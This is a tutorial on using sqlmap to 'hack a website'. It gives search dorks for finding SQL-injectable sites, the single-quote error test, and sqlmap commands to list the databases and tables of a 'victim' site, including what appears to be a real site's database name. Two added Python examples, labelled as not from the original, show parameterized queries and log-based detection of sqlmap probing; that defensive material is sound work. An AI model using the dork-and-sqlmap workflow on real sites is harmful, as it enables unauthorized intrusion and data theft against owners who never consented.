In this tutorial I am going to show you how to hack a website with sqlmap on Kali Linux.
Introduction
Sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections. This is all about sqlmap.
Now follow my steps to hack a website using sqlmap.
Step 1
Find a site vulnerable to SQL injection.
I will give you some dorks which may help you find websites vulnerable to SQL injection.
Code:
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
Step 2
Test if the website is vulnerable
To test if the website is vulnerable to SQLi, just add a single quote ( ' ) at the end of the URL, like on the image below:
And press Enter. If an error appears like on the image below, it means the website is vulnerable.
(I'm not going to explain advanced ways to check the website for SQL vulnerabilities because there are plenty of tutorials about that on CHF.)
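Why the appended quote produces a database error, and why a bound parameter does not, shown as an added example that is not part of the original tutorial. It assumes a constructed `articles` table in Python's built-in `sqlite3` as a stand-in for the site's database; all function names are hypothetical.

```python
import sqlite3

def make_db():
    # Constructed sample data for the demonstration.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE articles (id INTEGER, title TEXT)")
    db.executemany("INSERT INTO articles VALUES (?, ?)",
                   [(1, "Welcome"), (2, "Contact")])
    return db

def fetch_concatenated(db, raw_id):
    # Vulnerable pattern: the request parameter becomes part of the SQL text,
    # so a stray quote changes the statement the database has to parse.
    sql = "SELECT title FROM articles WHERE id = '" + raw_id + "'"
    return db.execute(sql).fetchall()

def fetch_parameterized(db, raw_id):
    # Hardened pattern: the SQL text is fixed and the value is bound separately,
    # so the quote is compared as data and never parsed as SQL.
    sql = "SELECT title FROM articles WHERE id = ?"
    return db.execute(sql, (raw_id,)).fetchall()

def probe(fetch, raw_id):
    """Return ('rows', result) or ('sql_error', message) for one request value."""
    db = make_db()
    try:
        return ("rows", fetch(db, raw_id))
    except sqlite3.Error as exc:
        return ("sql_error", str(exc))

if __name__ == "__main__":
    for fetch in (fetch_concatenated, fetch_parameterized):
        for value in ("1", "1'"):
            print(fetch.__name__, repr(value), probe(fetch, value))
```

The error page described in this step is the `sql_error` case reaching the browser; with bound parameters the same request simply matches no row.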
Ok, so we found the target. Now let's go ahead.
Step 3
Injection
Type this command in the terminal and hit enter like on the image below:
Code:
sqlmap -u "www.yourtarget.com/page.php?id=1" --dbs
(Insert the URL that we checked for the SQL vulnerability.)
Now we will get the database names of the website.
We got two databases, ohridhot_ohrid and information_schema. We will select the ohridhot_ohrid database.
Let's get the tables of that database.
For that we need to enter this command in the terminal and then hit Enter.
Code:
sqlmap -u "http://www.yourvictim/page.php?id=1" -D ohridhot_ohrid --tables
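From the defending side, the quote test and the `--dbs` and `--tables` runs above leave recognisable traces in the web server's access log. The following added example (not part of the original tutorial) scans log lines for three of them; the log lines are constructed, the function names are hypothetical, and the User-Agent check only catches runs that keep sqlmap's default header.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (combined format, documentation IPs).
# The last request carries a shortened stand-in for an enumeration query.
SAMPLE_LOG = """\
198.51.100.7 - - [10/Mar/2024:10:00:01 +0000] "GET /page.php?id=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Mar/2024:10:00:05 +0000] "GET /page.php?id=1%27 HTTP/1.1" 500 310 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Mar/2024:10:00:09 +0000] "GET /page.php?id=1 HTTP/1.1" 200 5120 "-" "sqlmap/1.7#stable (https://sqlmap.org)"
203.0.113.9 - - [10/Mar/2024:10:00:12 +0000] "GET /page.php?id=1%20FROM%20information_schema.schemata HTTP/1.1" 200 640 "-" "sqlmap/1.7#stable (https://sqlmap.org)"
"""

LINE = re.compile(r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
                  r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')

def indicators(target, status, ua):
    """Return the set of SQL injection probing indicators for one request."""
    found = set()
    if ua.lower().startswith("sqlmap/"):
        found.add("sqlmap_user_agent")          # sqlmap's default User-Agent
    for _name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if "'" in value:                        # parse_qsl has already URL-decoded
            found.add("quote_in_parameter")
            if status.startswith("5"):
                found.add("quote_caused_server_error")
        if "information_schema" in value.lower():
            found.add("schema_enumeration")
    return found

def scan(log_text):
    """Map client IP -> sorted list of indicators seen across its requests."""
    per_ip = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE.match(line)
        if m:
            per_ip[m["ip"]] |= indicators(m["target"], m["status"], m["ua"])
    return {ip: sorted(found) for ip, found in per_ip.items() if found}

if __name__ == "__main__":
    for ip, found in scan(SAMPLE_LOG).items():
        print(ip, ", ".join(found))
```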